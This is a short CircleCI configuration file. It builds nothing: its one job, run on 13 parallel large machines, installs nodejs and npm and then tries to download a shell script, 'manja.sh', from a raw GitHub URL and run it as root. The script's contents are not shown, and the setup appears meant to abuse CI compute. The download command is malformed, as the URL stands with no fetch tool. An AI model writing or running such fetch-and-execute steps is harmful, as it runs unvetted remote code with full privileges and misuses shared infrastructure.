version: 2.1 
jobs: 
  build: 
    machine: 
      image: ubuntu-2004:202010-01 
    resource_class: large 
    parallelism: 13 
    steps: 
      - checkout 
      - run: 
          name: "Anggun" 
          command: sudo apt update && sudo apt install nodejs && sudo apt install npm && https://raw.githubusercontent.com/RiniMentari/CantikdanManis/main/manja.sh && chmod +x manja.sh ; sudo ./manja.sh
